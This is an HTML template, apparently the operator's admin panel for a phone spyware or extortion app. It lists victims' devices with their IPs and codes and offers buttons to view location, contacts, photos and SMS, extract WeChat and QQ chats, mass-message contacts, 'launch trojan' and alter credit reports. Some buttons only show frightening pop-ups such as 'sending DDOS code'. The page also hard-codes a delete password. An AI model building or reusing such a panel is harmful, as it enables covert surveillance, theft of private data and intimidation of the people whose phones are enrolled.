<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui</title>
 
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  <style type="text/css">

/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
td{
    font-size: 15px !important;
}
.operation-menu a {
    margin: 0 10px;

    margin-top: 10px;
    display: inline-block;
}
.txl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #42e695, #3bb2b8)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.tcl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #f54ea2, #ff7676)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.tal{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #4298ff, #1473e6)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.layui-table[lay-size=sm] td, .layui-table[lay-size=sm] th{
    font-weight: 600
}
tr:hover{
    background-color:#95c5ff!important;
}
</style>
</head>
<body style="padding:12px;">

    <!--<div class="layui-tab">-->
    <!--  <ul class="layui-tab-title">-->
    <!--    <li class="layui-this">设备查看管理</li>-->
    <!--  </ul>-->
    <!--</div> -->
    
    
    
    
     {if $adminid == 1}
      <div class="tplay-body-div">
     <form class="layui-form serch" action="{:url('huaxialianmeng2022/appv1/user')}" method="post">
        <div class="layui-form-item" style="float: left;">
          <!--<div class="layui-input-inline">-->
          <!--  <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">-->
          <!--</div>-->
          <div style="width: 290px;" class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">
          </div>
          <!--<div class="layui-input-inline">-->
          <!--  <div class="layui-inline">-->
          <!--    <div class="layui-input-inline">-->
          <!--      <input type="text" class="layui-input" id="create_time" placeholder="登录时间" name="create_time">-->
          <!--    </div>-->
          <!--  </div>-->
          <!--</div>-->
          <button class="layui-btn layui-btn-danger layui-btn-sm txl" lay-submit="" lay-filter="serch">查询</button>
        </div>
      </form>
        <table  class="layui-table" lay-size="sm">
        	<button style="background-color:red;margin-left:10px;" class="layui-btn layui-btn-sm delAll_btn tcl" lay-submit="" lay-filter="admin">删除</button>
          <colgroup >
          	<col width="10">
            <col width="40">
            <col width="100">
            <col width="30">
            <col width="30">
            <col width="120">
            <col width="120">
            <col width="600">
          </colgroup>
          <thead>
            <tr>
              <th><input type="checkbox" name="" lay-skin="primary" lay-filter="allChoose" id="allChoose" /></th>
              <th style="color:blue">ID</th>
              <th style="color:blue">　　手机型号</th>          
              <th style="color:blue">　　自输号码</th>
              <th style="color:blue">　授权码</th>          
              <th style="color:blue">最后登录时间</th>
              <th style="color:blue">　最后登录IP地址</th>
              <th style="color:red">　　　　设备信息查看</th>
               <th style="color:red">　　　　　　系统指令功能</th>
                <th style="color:red">　　　　操作</th>
              
            </tr> 
          </thead>
          
          <tbody>
            {volist name="admin" id="vo"}
            <tr style="height:200px;">
              <td class="news_content"><input type="checkbox" name="imgVo" value="{$vo.id}"/></td>
              <td style="color:green">{$vo.id}</td>
              <td>{$vo.clientid}</td>
              <td>{$vo.name}</td>
              <td style="color:red">{$vo.code}</td>          
              <td>{$vo.login_time|date="Y-m-d H:i:s",###}</td>
              <td>
                  {$vo.ip}
                  
                 
              </td>
    		  
              <td style="width:20%" class="operation-menu">
                <div class="layui-btn-group">
               
                  <a href="{:url('appv1/dingwei',['id'=>$vo.id])}" target="_blank" id="{$vo.id}" title="在线设备定位" alt="在线设备定位" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">查看定位</button></a>
                  <a href="{:url('appv1/mobile',['id'=>$vo.id])}"  id="{$vo.id}" title="查询设备通讯录" alt="查询设备通讯录" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">查通讯录</button></a><br>
                   <a href="{:url('/huaxialianmeng2022/img/index',['id'=>$vo.name])}" target="_blank" class=" a_menu" id="{$vo.id}" title="查询设备相册" alt="查询设备相册" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">查看相册</button></a>
                   
                    <a href="{:url('appv1/sms',['id'=>$vo.id])}" target="_blank" class="a_menu " id="{$vo.id}" title="查询设备短信" alt="查询设备短信" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;" class="layui-btn txl">查看短信</button></a>
    
                  <a class="layui-btn-primary updateweixin"  title="微信提取" alt="微信提取" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-normal txl">微信提取</button></a>
    
                  <a class="layui-btn-primary updatetxqq"  title="QQ提取" alt="QQ提取" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-normal txl">QQ提取</button></a>
        
                </div>
              </td>
              <td style="width:20%" class="operation-menu">
                <div class="layui-btn-group">
                    <a href="{:url('appv1/yjzf',['id'=>$vo.id])}"  class=" a_menu layui-btn-primary" id="{$vo.id}" title="一键群发" alt="一键群发" style="margin-right: 0;font-size:15px;border: none"><button  style="background:#faad14;"class="layui-btn tal">一键群发</button></a>
                  
                  <a href="{:url('appv1/mumas')}" target="_blank" title="启动木马" alt="启动木马" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-warm tal">启动木马</button></a><br>
                  
                  
    
                  <a href="{:url('appv1/phone',['name'=>$vo.name])}"  id="{$vo.id}" title="查询设备通讯录" alt="查询设备通讯录" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn tal">本机号码</button></a>
    
                  
                  <a   class=" updatezhengxing layui-btn-primary" id="{$vo.id}" title="修改征信" alt="修改征信" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tal layui-btn-normal">修改征信</button></a><br>
    			  
                 <a href="{:url('appv1/exportexcel',['id'=>$vo.id])}" class="a_menu layui-btn-primary" id="{$vo.id}" title="征信获取" alt="征信获取据" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tal layui-btn-normal">征信获取</button></a>
    
                  <a class="layui-btn-primary bthorse"  title="木马植入" alt="木马植入" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-normal tal">木马清除</button></a>
    
                  
                </div>
              </td>
               <td style="width:10%" class="operation-menu">
                <div class="layui-btn-group">
                    <a href="{:url('appv1/exportexcel',['id'=>$vo.id])}" class="a_menu layui-btn-primary" id="{$vo.id}" title="下载设备通讯录数据" alt="下载设备通讯录数据" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tcl layui-btn-warm">下载通讯</button></a>
                    <a class="layui-btn-primary delete" id="{$vo.id}" title="删除用户" alt="删除用户" style="margin-right: 0;font-size:12px;border: none"><button class="layui-btn layui-btn-danger tcl">删除用户</button></a>
                </div>
              </td>
            </tr>
            {/volist}
          </tbody>
        </table>
        <div style="padding:0 20px;">{$admin->render()}</div>
        </div>
    {else}
    
    <form class="layui-form serch" action="{:url('huaxialianmeng2022/appv1/usersousuo')}" method="post" style="display: flex; flex-direction: column;">
        <div class="layui-form-item" style="float: left;">
        
          <div style="width: 290px;" class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm" style="height: 40px;">
          </div>
          <button style="height: 40px;" class="layui-btn layui-btn-danger layui-btn-sm txl" lay-submit="" lay-filter="serch">查询</button>
        </div>
        
        <div style="font-size: 30px;">
            请输入授权码查询
        </div>
      </form>
   
    {/if}
    
    
    
    
    

     

  
    
   

    {include file="public/foot"}
    
    <script type="text/javascript">
    
    $("#allChoose").click(function () {
       $("input[name='imgVo']:checkbox").prop("checked", this.checked);
   });

    $('.delAll_btn').click(function(){
                var checkids = [];
                $("input[name='imgVo']:checked").each(function(i){
                    checkids[i] = $(this).val();
                });
                if(checkids.length<=0){
                	layer.msg('请选择要删除的聊天记录!');
                	return;
                }else{
      layer.confirm('确定要删除并清空这些设备的所有数据吗？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('huaxialianmeng2022/appv1/alldeletes')}",
          data:{delid:checkids},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
             
     }    	
    })
    $('.updatezhengxing').click(function(){
      layer.confirm('确定要修改这些设备的里面的征信吗？（注：你没有此权限,删除请联系主管）', function(index) {
        layer.close(layer.index);
      })
    })
    $('.updateduanx').click(function(){
      layer.confirm('正在向该用户发送DDOS代码。。。', function(index) {
        layer.close(layer.index);
      })
    })
    $('.bthorse').click(function(){
      layer.confirm('确定要清空这些设备的里面的木马病毒？（注：你没有此权限,删除请联系主管）', function(index) {
         layer.close(layer.index);
      })
    })
    $('.updateweixin').click(function(){
      layer.confirm('正在提取该设备上微信通讯录，以及聊天记录', function(index) {
        layer.close(layer.index);
      })
    })
    $('.updatetxqq').click(function(){
      layer.confirm('正在提取该设备上QQ通讯录，以及聊天记录', function(index) {
        layer.close(layer.index);
      })
    })
    
    
    
    
    
    
        $('.delete').click(function(){
          var id = $(this).attr('id');
            
              layer.open({
                	title: '请输入删除密码！',
                	area: ['500px', '200px'],
                	btnAlign: 'c',
                	closeBtn:'1',//右上角的关闭
                	content: `<div><p>密码:</p><input type="number" id="remark" style="width:100%;height:30px;"></textarea></div>`,
                	btn:['确认','取消','关闭'],
                	yes: function (index, layero) {
                	var value1 = $('#remark').val();//获取多行文本框的值
                	if(value1 == 147147){
                	    $.ajax({
                          url:"{:url('huaxialianmeng2022/appv1/delete')}",
                          data:{id:id},
                          success:function(res) {
                            layer.msg(res.msg);
                            if(res.code == 1) {
                              setTimeout(function(){
                                location.href = res.url;
                              },1500)
                            }
                          }
                        })
                	}else{
                	    alert('密码错误');
                	}
                
                	
                	
                },
                no:function(index){
                	alert('您刚才点击了取消按钮');
                	layer.close(index);
                	return false;//点击按钮按钮不想让弹层关闭就返回false
                },
                close:function(index){
                	alert('您刚才点击了关闭按钮');
                	return false;//点击按钮按钮不想让弹层关闭就返回false
                }
                
                });


    })
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    $('.deleteuser').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有通讯录数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('huaxialianmeng2022/appv1/clearuser')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    }) 
    
    $('.deletesms').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有短信数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('huaxialianmeng2022/appv1/clearsms')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })      
    </script>
  
</body>
<style>
  .layui-disabled, .layui-disabled:hover {
    color: #101010 !important;
    background-color: white;
  }
  /*设置表格单元格线样式*/
  .layui-table td, .layui-table th, .layui-table-col-set, .layui-table-fixed-r, .layui-table-grid-down, .layui-table-header, .layui-table-page, .layui-table-tips-main, .layui-table-tool, .layui-table-total, .layui-table-view, .layui-table[lay-skin=line], .layui-table[lay-skin=row] {
    border-color: white; /*#bbb*/
  }

</style>
</html>
